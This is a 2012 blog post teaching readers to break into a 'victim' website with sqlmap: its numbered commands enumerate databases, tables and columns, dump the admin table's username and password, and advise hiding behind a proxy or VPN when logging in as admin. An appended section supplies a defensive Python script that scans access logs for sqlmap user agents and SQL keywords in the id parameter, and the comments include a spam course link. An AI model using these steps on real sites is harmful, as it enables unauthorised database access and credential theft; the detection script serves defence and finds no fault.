
18 October 2012

How to Hack Websites via SQL Map?


Hi friends, how are you? I hope all are fine. Today, having managed to find some time, I am going to tell you the procedure of website hacking using sqlmap. First, let's start with its definition: sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. To start with this tutorial, all you need are the 3 things mentioned below.

1. Backtrack 5

2. Vulnerable Website

3. A little bit of mind

Procedure for Hacking Websites using SQL Map 2012

1. First of all, open your BackTrack terminal, type cd /pentest/database/sqlmap and hit Enter. You are now in the sqlmap directory in your terminal.
2. Now find the vulnerable site. (In this case, I already have a vulnerable site.)
3. Now type this command in the terminal and hit Enter. (Refer to the figure above.)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 --dbs


4. Now you will get the database name of the website

Well, I got two databases, aj and information_schema; we will select the aj database.
5. Now get the tables of that database. For that, enter this command into your terminal and press Enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) --tables

6. Now we need to grab the tables from the aj database. Paste the command below and hit Enter.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj --tables

7. Now you will get the list of tables stored in the aj database.

8. Just grab the columns from the admin table and

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

Now we have the columns, including username and password.
9. Here we will grab the passwords of the admin.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we have the username and the password of the website!

Now just find the admin panel of the website, and use a proxy/VPN when you are trying to log in to the website as an admin.

10. That's it! Enjoy hacking.
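
From the defender's side, the enumeration in steps 3 to 9 leaves a trail in the web server's access log. The following is an added example, not part of the original post: a Python script that flags clients probing the numeric id parameter. The log lines are constructed, and the function names and keyword list are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Oct/2012:10:01:02 +0000] "GET /index.php?id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [18/Oct/2012:10:02:10 +0000] "GET /index.php?id=4%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [18/Oct/2012:10:02:11 +0000] "GET /index.php?id=4%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [18/Oct/2012:10:02:12 +0000] "GET /index.php?id=4%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.schemata)%3E0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.4 - - [18/Oct/2012:10:03:00 +0000] "GET /index.php?id=17 HTTP/1.1" 200 4801 "-" "Mozilla/5.0 (Windows NT 6.1)"
"""

# Captures client IP, request target and User-Agent from a combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
# Assumed keyword list; tune it to the application's legitimate traffic.
SQL_TOKENS = re.compile(r"\b(union|select|information_schema|sleep|benchmark)\b", re.I)

def reasons_for(line):
    """Return (ip, reasons) for one log line; reasons is empty for benign lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None, set()
    ip, target, agent = m.groups()
    reasons = set()
    # sqlmap announces itself unless the header is overridden, so this is
    # a cheap signal and must not be the only one.
    if agent.lower().startswith("sqlmap/"):
        reasons.add("sqlmap-user-agent")
    # parse_qs percent-decodes, so encoded payloads are inspected in clear.
    for value in parse_qs(urlsplit(target).query, keep_blank_values=True).get("id", []):
        if not (value.isascii() and value.isdigit()):  # id should be a plain integer
            reasons.add("non-integer-id")
        if SQL_TOKENS.search(value):
            reasons.add("sql-keyword-in-id")
    return ip, reasons

def suspicious_clients(log_text):
    """Aggregate reasons per client IP across the whole log."""
    found = defaultdict(set)
    for line in log_text.splitlines():
        ip, reasons = reasons_for(line)
        if reasons:
            found[ip] |= reasons
    return {ip: sorted(r) for ip, r in found.items()}

if __name__ == "__main__":
    for ip, why in suspicious_clients(SAMPLE_LOG).items():
        print(ip, ", ".join(why))
```

The non-integer-id check is the one that survives a changed User-Agent, and the same rule enforced in the application (reject any id that is not an integer, and bind it as a query parameter) removes the injection point itself.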

2 comments :

  1. AwesUMM...!!
    IT worksss...100 %%% :)))
    thanks

  2. Hello, I would like to ask what the benefits of SQL training are, what topics should be covered, as it is kind of bothering me … and has anyone studied from this course http://www.wiziq.com/course/125-comprehensive-introduction-to-sql of SQL tutorial online?? Or tell me any other guidance...
    I would really appreciate help… and also I would like to thank you for all the information you are providing on SQL training.

Regards
karan chauhan

 
